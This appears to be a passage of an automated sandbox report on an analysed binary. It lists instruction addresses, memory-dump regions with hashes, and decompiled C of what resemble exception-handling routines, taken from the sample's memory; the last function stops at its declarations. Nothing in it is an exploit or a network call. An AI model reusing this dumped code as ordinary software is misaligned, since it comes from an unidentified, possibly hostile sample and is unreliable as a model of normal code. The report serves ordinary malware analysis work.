                                                                                                                                                                                                                                          0x00402510
                                                                                                                                                                                                                                          0x00402510
                                                                                                                                                                                                                                          0x00402510
                                                                                                                                                                                                                                          0x00402519
                                                                                                                                                                                                                                          0x0040251a
                                                                                                                                                                                                                                          0x0040251c
                                                                                                                                                                                                                                          0x0040251e
                                                                                                                                                                                                                                          0x0040251e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402510
                                                                                                                                                                                                                                          0x004024e0
                                                                                                                                                                                                                                          0x004024e3
                                                                                                                                                                                                                                          0x004024e5
                                                                                                                                                                                                                                          0x004024f7
                                                                                                                                                                                                                                          0x004024f7
                                                                                                                                                                                                                                          0x004024fa
                                                                                                                                                                                                                                          0x004024fc
                                                                                                                                                                                                                                          0x004024fc
                                                                                                                                                                                                                                          0x004024fd
                                                                                                                                                                                                                                          0x004024fd
                                                                                                                                                                                                                                          0x00402503
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024e7
                                                                                                                                                                                                                                          0x004024e7
                                                                                                                                                                                                                                          0x004024e7
                                                                                                                                                                                                                                          0x004024ee
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024f0
                                                                                                                                                                                                                                          0x004024f0
                                                                                                                                                                                                                                          0x004024f1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024f1
                                                                                                                                                                                                                                          0x004024f3
                                                                                                                                                                                                                                          0x004024f5
                                                                                                                                                                                                                                          0x00402508
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402508
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024f5
                                                                                                                                                                                                                                          0x00402467
                                                                                                                                                                                                                                          0x0040246a
                                                                                                                                                                                                                                          0x0040246d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040246f
                                                                                                                                                                                                                                          0x00402471
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402471
                                                                                                                                                                                                                                          0x00402436
                                                                                                                                                                                                                                          0x00402438
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 004024A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2850889275-0
                                                                                                                                                                                                                                          • Opcode ID: dad39b4e66b4513978a9f82534be417ee246fbd05aba7607fff0bc3918494d19
                                                                                                                                                                                                                                          • Instruction ID: 4a521fd059bc0b268892915b49c33b42748136bc382a4e7312f479a61c6dced9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dad39b4e66b4513978a9f82534be417ee246fbd05aba7607fff0bc3918494d19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D761F930600502AFDB29CF29DFAC62673A5FB95314B24843BD942F72D1E7B9DC82865C
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600648923.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t32c
                                                                                                                                                                                                                                          • API String ID: 0-3674199949
                                                                                                                                                                                                                                          • Opcode ID: f2ebc4c6a48cfe5601a6ace997b79ecf8ae29c40ddede3ccd54cfb746bfe7157
                                                                                                                                                                                                                                          • Instruction ID: 5da5541cab4c5ced99a0cf2087998c3511ae95c0f2b6967a96525f83a56d3085
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ebc4c6a48cfe5601a6ace997b79ecf8ae29c40ddede3ccd54cfb746bfe7157
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CED1F976A0021DEFDF24CB90CC80BAABBB5FF89314F198195D649A7116D330AE85DF61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600648923.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 03878353c38bb053fef0567d2f1903d33a8bc55c5f329362ce4d1c21dfb157c7
                                                                                                                                                                                                                                          • Instruction ID: a5bb0746fb7d7cdafc9b5b08c0a9db138146a7b4bf3ee4cc60f20a0018066ade
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03878353c38bb053fef0567d2f1903d33a8bc55c5f329362ce4d1c21dfb157c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF411B72A0021DDFDF20CF44D880BA9BBB5FB48314F5A8595DA8967216D370EE85CFA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600648923.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 394b649e328b1df1404da37bd1b9a63264ebc17e19e9de328f3921affac317c7
                                                                                                                                                                                                                                          • Instruction ID: e33513dc3f2f361855a00c4dac46c6525cce1a465977f5549fdf89a418210f90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 394b649e328b1df1404da37bd1b9a63264ebc17e19e9de328f3921affac317c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B311776A00219DFDB24CF54C980B69BBB5FF88710F198594DA496B216C370ED81CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                                          			E0112B0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                          				signed int* _t43;
                                                                                                                                                                                                                                          				char _t44;
                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                          				intOrPtr* _t53;
                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                                                          				long _t66;
                                                                                                                                                                                                                                          				signed int* _t80;
                                                                                                                                                                                                                                          				signed int* _t82;
                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t43 = _t84;
                                                                                                                                                                                                                                          				_t65 = __ebx + 2;
                                                                                                                                                                                                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                          				_t89 = _t95;
                                                                                                                                                                                                                                          				_t96 = _t95 - 8;
                                                                                                                                                                                                                                          				_push(_t65);
                                                                                                                                                                                                                                          				_push(_t84);
                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                          				asm("cld");
                                                                                                                                                                                                                                          				_t66 = _a8;
                                                                                                                                                                                                                                          				_t44 = _a4;
                                                                                                                                                                                                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                          					_push(_t89);
                                                                                                                                                                                                                                          					E0112B243(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                          					_t46 = 1;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_v12 = _t44;
                                                                                                                                                                                                                                          					_v8 = _a12;
                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                          					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                          					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                          					_t49 = E0112B2FD(_t66);
                                                                                                                                                                                                                                          					_t99 = _t96 + 4;
                                                                                                                                                                                                                                          					if(_t49 == 0) {
                                                                                                                                                                                                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                          								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t54 =  *_t53();
                                                                                                                                                                                                                                          								_t89 = _t89;
                                                                                                                                                                                                                                          								_t86 = _t86;
                                                                                                                                                                                                                                          								_t66 = _a8;
                                                                                                                                                                                                                                          								_t55 = _t54;
                                                                                                                                                                                                                                          								_t106 = _t54;
                                                                                                                                                                                                                                          								if(_t106 == 0) {
                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									if(_t106 < 0) {
                                                                                                                                                                                                                                          										_t46 = 0;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                          										E0112B1E8(_t55, _t66);
                                                                                                                                                                                                                                          										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                          										E0112B243(_t89, _t66, 0);
                                                                                                                                                                                                                                          										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                          										E0112B2DF(_t82[2]);
                                                                                                                                                                                                                                          										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                          										_t66 = 0;
                                                                                                                                                                                                                                          										_t86 = 0;
                                                                                                                                                                                                                                          										 *(_t82[2])(1);
                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                          						_t46 = 1;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                          				return _t46;
                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                          0x0112b0e0
                                                                                                                                                                                                                                          0x0112b0e1
                                                                                                                                                                                                                                          0x0112b0e2
                                                                                                                                                                                                                                          0x0112b0e5
                                                                                                                                                                                                                                          0x0112b0e7
                                                                                                                                                                                                                                          0x0112b0ea
                                                                                                                                                                                                                                          0x0112b0eb
                                                                                                                                                                                                                                          0x0112b0ed
                                                                                                                                                                                                                                          0x0112b0ee
                                                                                                                                                                                                                                          0x0112b0ef
                                                                                                                                                                                                                                          0x0112b0f2
                                                                                                                                                                                                                                          0x0112b0fc
                                                                                                                                                                                                                                          0x0112b1ad
                                                                                                                                                                                                                                          0x0112b1b4
                                                                                                                                                                                                                                          0x0112b1bd
                                                                                                                                                                                                                                          0x0112b102
                                                                                                                                                                                                                                          0x0112b102
                                                                                                                                                                                                                                          0x0112b108
                                                                                                                                                                                                                                          0x0112b10e
                                                                                                                                                                                                                                          0x0112b111
                                                                                                                                                                                                                                          0x0112b114
                                                                                                                                                                                                                                          0x0112b118
                                                                                                                                                                                                                                          0x0112b11d
                                                                                                                                                                                                                                          0x0112b122
                                                                                                                                                                                                                                          0x0112b1a2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b124
                                                                                                                                                                                                                                          0x0112b124
                                                                                                                                                                                                                                          0x0112b130
                                                                                                                                                                                                                                          0x0112b132
                                                                                                                                                                                                                                          0x0112b18d
                                                                                                                                                                                                                                          0x0112b18d
                                                                                                                                                                                                                                          0x0112b193
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b134
                                                                                                                                                                                                                                          0x0112b143
                                                                                                                                                                                                                                          0x0112b145
                                                                                                                                                                                                                                          0x0112b146
                                                                                                                                                                                                                                          0x0112b147
                                                                                                                                                                                                                                          0x0112b14a
                                                                                                                                                                                                                                          0x0112b14a
                                                                                                                                                                                                                                          0x0112b14c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b14e
                                                                                                                                                                                                                                          0x0112b14e
                                                                                                                                                                                                                                          0x0112b198
                                                                                                                                                                                                                                          0x0112b150
                                                                                                                                                                                                                                          0x0112b150
                                                                                                                                                                                                                                          0x0112b154
                                                                                                                                                                                                                                          0x0112b15c
                                                                                                                                                                                                                                          0x0112b161
                                                                                                                                                                                                                                          0x0112b166
                                                                                                                                                                                                                                          0x0112b172
                                                                                                                                                                                                                                          0x0112b17a
                                                                                                                                                                                                                                          0x0112b181
                                                                                                                                                                                                                                          0x0112b187
                                                                                                                                                                                                                                          0x0112b18b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b18b
                                                                                                                                                                                                                                          0x0112b14e
                                                                                                                                                                                                                                          0x0112b14c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b132
                                                                                                                                                                                                                                          0x0112b1a6
                                                                                                                                                                                                                                          0x0112b1a6
                                                                                                                                                                                                                                          0x0112b1a6
                                                                                                                                                                                                                                          0x0112b122
                                                                                                                                                                                                                                          0x0112b1c2
                                                                                                                                                                                                                                          0x0112b1c9

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                          • Instruction ID: 407f31bcc5b409a38e55a73f9e7d7ced4a4e89d4a8e5090b0eb07a22c8a257ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721C872904215AFDB18EF68DCC09ABBBB5FF45350B058168D9159B245D730FA25CBE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                                          			E004021D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                          				signed int* _t43;
                                                                                                                                                                                                                                          				char _t44;
                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                          				intOrPtr* _t53;
                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                                                          				long _t66;
                                                                                                                                                                                                                                          				signed int* _t80;
                                                                                                                                                                                                                                          				signed int* _t82;
                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t43 = _t84;
                                                                                                                                                                                                                                          				_t65 = __ebx + 2;
                                                                                                                                                                                                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                          				_t89 = _t95;
                                                                                                                                                                                                                                          				_t96 = _t95 - 8;
                                                                                                                                                                                                                                          				_push(_t65);
                                                                                                                                                                                                                                          				_push(_t84);
                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                          				asm("cld");
                                                                                                                                                                                                                                          				_t66 = _a8;
                                                                                                                                                                                                                                          				_t44 = _a4;
                                                                                                                                                                                                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                          					_push(_t89);
                                                                                                                                                                                                                                          					E0040233B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                          					_t46 = 1;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_v12 = _t44;
                                                                                                                                                                                                                                          					_v8 = _a12;
                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                          					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                          					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                          					_t49 = E004023F5(_t66);
                                                                                                                                                                                                                                          					_t99 = _t96 + 4;
                                                                                                                                                                                                                                          					if(_t49 == 0) {
                                                                                                                                                                                                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                          								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t54 =  *_t53();
                                                                                                                                                                                                                                          								_t89 = _t89;
                                                                                                                                                                                                                                          								_t86 = _t86;
                                                                                                                                                                                                                                          								_t66 = _a8;
                                                                                                                                                                                                                                          								_t55 = _t54;
                                                                                                                                                                                                                                          								_t106 = _t54;
                                                                                                                                                                                                                                          								if(_t106 == 0) {
                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									if(_t106 < 0) {
                                                                                                                                                                                                                                          										_t46 = 0;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                          										E004022E0(_t55, _t66);
                                                                                                                                                                                                                                          										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                          										E0040233B(_t89, _t66, 0);
                                                                                                                                                                                                                                          										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                          										E004023D7(_t82[2], 1);
                                                                                                                                                                                                                                          										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                          										_t66 = 0;
                                                                                                                                                                                                                                          										_t86 = 0;
                                                                                                                                                                                                                                          										 *(_t82[2])();
                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                          						_t46 = 1;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                          				return _t46;
                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                          0x004021d8
                                                                                                                                                                                                                                          0x004021d9
                                                                                                                                                                                                                                          0x004021da
                                                                                                                                                                                                                                          0x004021dd
                                                                                                                                                                                                                                          0x004021df
                                                                                                                                                                                                                                          0x004021e2
                                                                                                                                                                                                                                          0x004021e3
                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                          0x004021e6
                                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                                          0x004021ea
                                                                                                                                                                                                                                          0x004021f4
                                                                                                                                                                                                                                          0x004022a5
                                                                                                                                                                                                                                          0x004022ac
                                                                                                                                                                                                                                          0x004022b5
                                                                                                                                                                                                                                          0x004021fa
                                                                                                                                                                                                                                          0x004021fa
                                                                                                                                                                                                                                          0x00402200
                                                                                                                                                                                                                                          0x00402206
                                                                                                                                                                                                                                          0x00402209
                                                                                                                                                                                                                                          0x0040220c
                                                                                                                                                                                                                                          0x00402210
                                                                                                                                                                                                                                          0x00402215
                                                                                                                                                                                                                                          0x0040221a
                                                                                                                                                                                                                                          0x0040229a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040221c
                                                                                                                                                                                                                                          0x0040221c
                                                                                                                                                                                                                                          0x00402228
                                                                                                                                                                                                                                          0x0040222a
                                                                                                                                                                                                                                          0x00402285
                                                                                                                                                                                                                                          0x00402285
                                                                                                                                                                                                                                          0x0040228b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040222c
                                                                                                                                                                                                                                          0x0040223b
                                                                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                                                                          0x0040223e
                                                                                                                                                                                                                                          0x0040223f
                                                                                                                                                                                                                                          0x00402242
                                                                                                                                                                                                                                          0x00402242
                                                                                                                                                                                                                                          0x00402244
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402246
                                                                                                                                                                                                                                          0x00402246
                                                                                                                                                                                                                                          0x00402290
                                                                                                                                                                                                                                          0x00402248
                                                                                                                                                                                                                                          0x00402248
                                                                                                                                                                                                                                          0x0040224c
                                                                                                                                                                                                                                          0x00402254
                                                                                                                                                                                                                                          0x00402259
                                                                                                                                                                                                                                          0x0040225e
                                                                                                                                                                                                                                          0x0040226a
                                                                                                                                                                                                                                          0x00402272
                                                                                                                                                                                                                                          0x00402279
                                                                                                                                                                                                                                          0x0040227f
                                                                                                                                                                                                                                          0x00402283
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402283
                                                                                                                                                                                                                                          0x00402246
                                                                                                                                                                                                                                          0x00402244
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040222a
                                                                                                                                                                                                                                          0x0040229e
                                                                                                                                                                                                                                          0x0040229e
                                                                                                                                                                                                                                          0x0040229e
                                                                                                                                                                                                                                          0x0040221a
                                                                                                                                                                                                                                          0x004022ba
                                                                                                                                                                                                                                          0x004022c1

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                          • Instruction ID: e279de3dac0af939908f9b90ec597c41c3b231ad52d0f367bd4c7c8b727de6f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21B8729002049BCB10DFA9C9849A7F7A5FF48350B4681BEDD15AB2C5D774FA15C7E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600648923.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ea948ca198fb4352e000d97b80fe0739e9adc373a916efecd5660a5669a9b999
                                                                                                                                                                                                                                          • Instruction ID: 5627439653bb656b10eb6f802551c66e290cb0383bd469314f5aca9be2b2e003
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea948ca198fb4352e000d97b80fe0739e9adc373a916efecd5660a5669a9b999
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0F89641178637EE40987C94292C737C4D7973D1FB77C66C8508F906A0687A0F7781
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600648923.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                                                          • Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                                                                          			E0112514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                          				intOrPtr _v4;
                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                          				intOrPtr _t35;
                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                          				int _t80;
